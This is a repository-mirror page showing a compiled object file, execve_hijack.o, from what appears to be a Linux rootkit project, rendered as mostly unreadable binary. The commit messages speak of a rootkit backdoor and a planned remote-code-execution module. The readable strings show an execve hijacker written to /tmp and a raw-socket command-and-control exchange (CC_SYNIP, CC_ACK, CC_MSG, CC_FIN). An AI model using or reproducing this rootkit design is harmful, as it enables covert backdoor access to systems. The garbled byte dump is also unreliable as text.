admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-21 17:23:07 +08:00
Code Issues Packages Projects Releases Wiki Activity
Files
b68e01c057dfa05a105dde8baee01741b99c87cd
TripleCross/src/helpers/execve_hijack.o

14 lines
4.8 KiB
Plaintext
Raw Normal View History

Finished pseudo-connection between client and rootkit backdoor. Updated library to latest version.
2022-02-18 03:32:07 -05:00
ELF><00>@@ <00><1E>UH<55><48>H<EFBFBD><48>0dH<64>%(H<>E<EFBFBD>1<EFBFBD><31><00><00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<><48><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>u
<EFBFBD><00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>u
<EFBFBD><00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>@H<><00>8<EFBFBD>H<><48>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48>H<EFBFBD><48><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>M<EFBFBD>dH+ %(t<05><00><><EFBFBD><1E>UH<55><48>H<EFBFBD><48>0<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>dH<64>%(H<>E<EFBFBD>1<EFBFBD>H<EFBFBD>=<00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD>H<><48><00><><EFBFBD>Dž<EFBFBD><C785><EFBFBD><EFBFBD><00>=<3D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>H<EFBFBD><14>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<01>H<EFBFBD><10><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>=<00><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><01><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;<3B><><EFBFBD><EFBFBD><EFBFBD>|<7C><><EFBFBD><00>BH<>=<00><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Dž<EFBFBD><C785><EFBFBD><EFBFBD><00>0<EFBFBD><30><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Hc<48>H<EFBFBD><48><00><><EFBFBD>H<EFBFBD> <02><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>Ή<EFBFBD><CE89><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><01><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Hc<48>H<EFBFBD><48><00><><EFBFBD>H<01><0F><00><>u<EFBFBD><75><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>5<00><><EFBFBD>Dž<><C785><EFBFBD><EFBFBD><00>2H<32><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><10><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>H<EFBFBD> <02><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>Ή<EFBFBD><CE89><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><10><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>H<01><0F><00><>u<EFBFBD><75><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>5<00><><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<><48> <20><><EFBFBD>H<EFBFBD>5H<><48><EFBFBD><00><00>H<><48><08><><EFBFBD>H<EFBFBD><48> <20><><EFBFBD>H<EFBFBD>p H<>E<EFBFBD><45>H<>¿<00>H<><48><08><><EFBFBD>H<EFBFBD><48>H<EFBFBD>=<00><00>H<><48>P<EFBFBD><50><EFBFBD>H<EFBFBD>u<EFBFBD>H<EFBFBD><48><08><><EFBFBD>H<EFBFBD><48>H<> QA<51>I<><49>H<EFBFBD>Ѻ(#<00>@H<><48><EFBFBD>H<><48>H<><48><08><>p<EFBFBD><70><EFBFBD><EFBFBD><EFBFBD>h<EFBFBD><68><EFBFBD><EFBFBD><EFBFBD>`<60><><EFBFBD><EFBFBD><EFBFBD>X<EFBFBD><58><EFBFBD><EFBFBD><EFBFBD>P<EFBFBD><50><EFBFBD><EFBFBD>H<><48>0<EFBFBD><30>y
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>?Dž<><C785><EFBFBD><EFBFBD><00>H<>E<EFBFBD>H<EFBFBD>5H<><48><EFBFBD>H<>=<00>H<>E<EFBFBD>H<EFBFBD><48><10><><EFBFBD>H<EFBFBD><48><10><><EFBFBD>H<EFBFBD>5H<><48><EFBFBD>H<><48><18><><EFBFBD>H<EFBFBD>5<00><00>H<><48><18><><EFBFBD>H<EFBFBD><48><18><><EFBFBD><0F><>H<><48><18><><EFBFBD>H<EFBFBD>5H<><48><EFBFBD><00><>uH<>=<00>Dž<><C785><EFBFBD><EFBFBD><00>H<7F><48><18><><EFBFBD>H<EFBFBD><48>H<EFBFBD>=<00><00>H<>E<EFBFBD>H<EFBFBD>u<EFBFBD>H<EFBFBD><48><08><><EFBFBD>H<EFBFBD><48>H<> QA<51>I<><49>H<EFBFBD>Ѻ(#<00>@H<><48><EFBFBD>H<><48>H<><48><08>u<EFBFBD><75>u<EFBFBD><75>u<EFBFBD><75>u<EFBFBD><75>u<EFBFBD><75>H<><48>0<EFBFBD><30>y<07><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><12><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><0F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>M<EFBFBD>dH+ %(t<05><00><>Hello world from execve hijackerArgument %i is %s
Updated my RawTCPLib library with newest version supporting sniffing for payloads. Also new data in preparation for complete RCE module
2022-02-16 19:38:39 -05:00
/tmp/execve_hijack
Finished pseudo-connection between client and rootkit backdoor. Updated library to latest version.
2022-02-18 03:32:07 -05:00
CC_SYNIP: %s
CC_ACKCC_MSG#Received client message#CC_FINConnection closed by requestReceived request: %s
GCC: (Ubuntu 10.3.0-1ubuntu1) 10.3.0GNU<00>zRx <08><00>E<10>C <02> <
E<10>C  <00><><00>#9@LQ_ip<00><00>
<00><00><00><00><00><00><00><00><00><00><00><00><00>execve_hijack.cgetLocalIpAddress_GLOBAL_OFFSET_TABLE_callocgethostnameexitgethostbynameinet_ntoastrcpy__stack_chk_failmainputslocaltimeasctimeprintfopenwritecloserawsocket_sniff_patterninet_ntopbuild_standard_packetrawsocket_sendstrtokstrcmp)<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>D<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>]<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>l <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>#<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>9<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>x<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>0<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> C'<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>^<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>E<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>G<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>N
<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>'VF<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>q<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>]<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>e<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>}<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>}<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <00>%<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>B<00>L<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>f]<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> @<00>.symtab.strtab.shstrtab.rela.text.data.bss.rodata.comment.note.GNU-stack.note.gnu.property.rela.eh_frame @<00>@0
<00> &,1 <00>90<00>&BR j(Xe@<00>0 <00><00>  
(t
Reference in New Issue Copy Permalink